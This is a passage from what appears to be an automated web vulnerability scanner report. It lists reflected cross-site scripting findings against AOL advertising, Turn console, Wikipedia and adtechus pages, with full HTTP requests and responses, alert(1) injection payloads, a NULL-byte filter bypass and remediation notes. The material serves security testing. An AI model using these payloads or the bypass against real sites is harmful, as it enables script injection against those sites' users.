Date: Sun, 13 Nov 2011 18:52:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=8fb55102fed4cb23bf983b99bbf04ceb; expires=Tue, 06 Dec 2011 22:26:02 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/6fa0b"><script>alert(1)</script>8be81e07a93/8/1/293319859/" />
...[SNIP]...

2.56. http://advertising.aol.com/token/8/1/293319859/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/293319859/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b519b"-alert(1)-"194f1a3a725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b519b"-alert(1)-"194f1a3a725/8/1/293319859/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=f38f1469c479150296ddee7880cc4b05; expires=Tue, 06 Dec 2011 22:26:09 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b519b"-alert(1)-"194f1a3a725/8/1/293319859/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.57. http://advertising.aol.com/token/8/3/784172255/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/784172255/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 950e4"-alert(1)-"189cfc449ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /950e4"-alert(1)-"189cfc449ef/8/3/784172255/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=017057a1d994cdcc5ae36abfbe80a5ac; expires=Tue, 06 Dec 2011 22:29:09 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/950e4"-alert(1)-"189cfc449ef/8/3/784172255/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.58. http://advertising.aol.com/token/8/3/784172255/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/784172255/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e62"><script>alert(1)</script>7d989240223 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f2e62"><script>alert(1)</script>7d989240223/8/3/784172255/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=6c812fa5008f57172b1ae1ed20d46037; expires=Tue, 06 Dec 2011 22:29:00 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f2e62"><script>alert(1)</script>7d989240223/8/3/784172255/" />
...[SNIP]...

2.59. https://console.turn.com/app/account/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.turn.com
Path:   /app/account/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c887f'><script>alert(1)</script>aa62467c64f40c037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/accountc887f'><script>alert(1)</script>aa62467c64f40c037/index.htm?loginPage=true&accountName=xss&accountPassword=xss&btnlogin=Log+In+%3E HTTP/1.1
Host: console.turn.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://console.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://console.turn.com/login/login.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; SIFR-PREFETCHED=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:37 GMT
Content-Length: 5593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
<form name=f action='/app/accountc887f'><script>alert(1)</script>aa62467c64f40c037/index.htm?loginPage=true&accountName=xss&accountPassword=xss&btnlogin=Log+In+%3E' method=post>
...[SNIP]...

2.60. https://console.turn.com/app/account/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.turn.com
Path:   /app/account/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a2596'><script>alert(1)</script>f67a6e7693f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/accounta2596'><script>alert(1)</script>f67a6e7693f/index.htm HTTP/1.1
Host: console.turn.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://console.turn.com/app/account/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: screenRes=1920x1200; optOut=1; SIFR-PREFETCHED=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:38 GMT
Content-Length: 4851


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
<form name=f action='/app/accounta2596'><script>alert(1)</script>f67a6e7693f/index.htm?' method=post>
...[SNIP]...

2.61. https://console.turn.com/app/account/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.turn.com
Path:   /app/account/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aea6c'><script>alert(1)</script>6454f32d8af90bb62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/account/index.htmaea6c'><script>alert(1)</script>6454f32d8af90bb62?loginPage=true&accountName=xss&accountPassword=xss&btnlogin=Log+In+%3E HTTP/1.1
Host: console.turn.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://console.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://console.turn.com/login/login.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; SIFR-PREFETCHED=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:38 GMT
Content-Length: 5593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
<form name=f action='/app/account/index.htmaea6c'><script>alert(1)</script>6454f32d8af90bb62?loginPage=true&accountName=xss&accountPassword=xss&btnlogin=Log+In+%3E' method=post>
...[SNIP]...

2.62. https://console.turn.com/app/account/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.turn.com
Path:   /app/account/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae8dc'><script>alert(1)</script>4fdced80037 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/account/index.htmae8dc'><script>alert(1)</script>4fdced80037 HTTP/1.1
Host: console.turn.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://console.turn.com/app/account/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: screenRes=1920x1200; optOut=1; SIFR-PREFETCHED=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:39 GMT
Content-Length: 4851


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
<form name=f action='/app/account/index.htmae8dc'><script>alert(1)</script>4fdced80037?' method=post>
...[SNIP]...

2.63. https://console.turn.com/app/account/index.htm [accountName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.turn.com
Path:   /app/account/index.htm

Issue detail

The value of the accountName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3023"><script>alert(1)</script>3d6acffa253da2679 was submitted in the accountName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/account/index.htm?loginPage=true&accountName=xssb3023"><script>alert(1)</script>3d6acffa253da2679&accountPassword=xss&btnlogin=Log+In+%3E HTTP/1.1
Host: console.turn.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://console.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://console.turn.com/login/login.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; SIFR-PREFETCHED=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:36 GMT
Content-Length: 5642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
<input type="text" name="accountName" id="accountName" value="xssb3023"><script>alert(1)</script>3d6acffa253da2679" maxlength="255" class="fTxt" />
...[SNIP]...

2.64. https://console.turn.com/app/account/index.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.turn.com
Path:   /app/account/index.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aae57'><script>alert(1)</script>cea82ee4671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/account/index.htm?aae57'><script>alert(1)</script>cea82ee4671=1 HTTP/1.1
Host: console.turn.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://console.turn.com/app/account/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: screenRes=1920x1200; optOut=1; SIFR-PREFETCHED=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:37 GMT
Content-Length: 4853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
<form name=f action='/app/account/index.htm?aae57'><script>alert(1)</script>cea82ee4671=1' method=post>
...[SNIP]...

2.65. http://en.wikipedia.org/wiki/Key_performance_indicator [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Key_performance_indicator

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00c0f92<script>alert(1)</script>ab452e42d4 was submitted in the REST URL parameter 2. This input was echoed as c0f92<script>alert(1)</script>ab452e42d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Key_performance_indicator%00c0f92<script>alert(1)</script>ab452e42d4 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:59:09 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/Key_performance_indicator%00c0f92<script>alert(1)</script>ab452e42d4
Content-Length: 5477
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/Key_performance_ind
...[SNIP]...
<p style="font-weight: bold;">To check for "Key_performance_indicator%00c0f92<script>alert(1)</script>ab452e42d4" on Wikipedia, see:
<a href="//en.wikipedia.org/wiki/Key_performance_indicator%00c0f92<script>
...[SNIP]...

2.66. http://en.wikipedia.org/wiki/Key_performance_indicator [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Key_performance_indicator

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008139b"><script>alert(1)</script>a69718f6a5f was submitted in the REST URL parameter 2. This input was echoed as 8139b"><script>alert(1)</script>a69718f6a5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Key_performance_indicator%008139b"><script>alert(1)</script>a69718f6a5f HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:58:50 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/Key_performance_indicator%008139b"><script>alert(1)</script>a69718f6a5f
Content-Length: 5511
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq64.wikimedia.org
X-Cache-Lookup: MISS from sq64.wikimedia.org:3128
X-Cache: MISS from sq78.wikimedia.org
X-Cache-Lookup: MISS from sq78.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/Key_performance_ind
...[SNIP]...
<a href="//en.wikipedia.org/wiki/Key_performance_indicator%008139b"><script>alert(1)</script>a69718f6a5f" title="Wikipedia:Key_performance_indicator%008139b">
...[SNIP]...

2.67. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f17ef"><script>alert(1)</script>57278624b7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naif17ef"><script>alert(1)</script>57278624b7b/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSf028c356eb7b44fd5733c118ec85ae5a=9a01c9a69cff3008847757cc0b190382; expires=Tue, 06 Dec 2011 22:26:27 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.ad.us-ec.adtechus.com/naif17ef"><script>alert(1)</script>57278624b7b/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.68. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d21"-alert(1)-"5f3fdab1031 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai92d21"-alert(1)-"5f3fdab1031/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSf028c356eb7b44fd5733c118ec85ae5a=a0246092ed2a9a8583bcbf867e062f17; expires=Tue, 06 Dec 2011 22:26:31 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
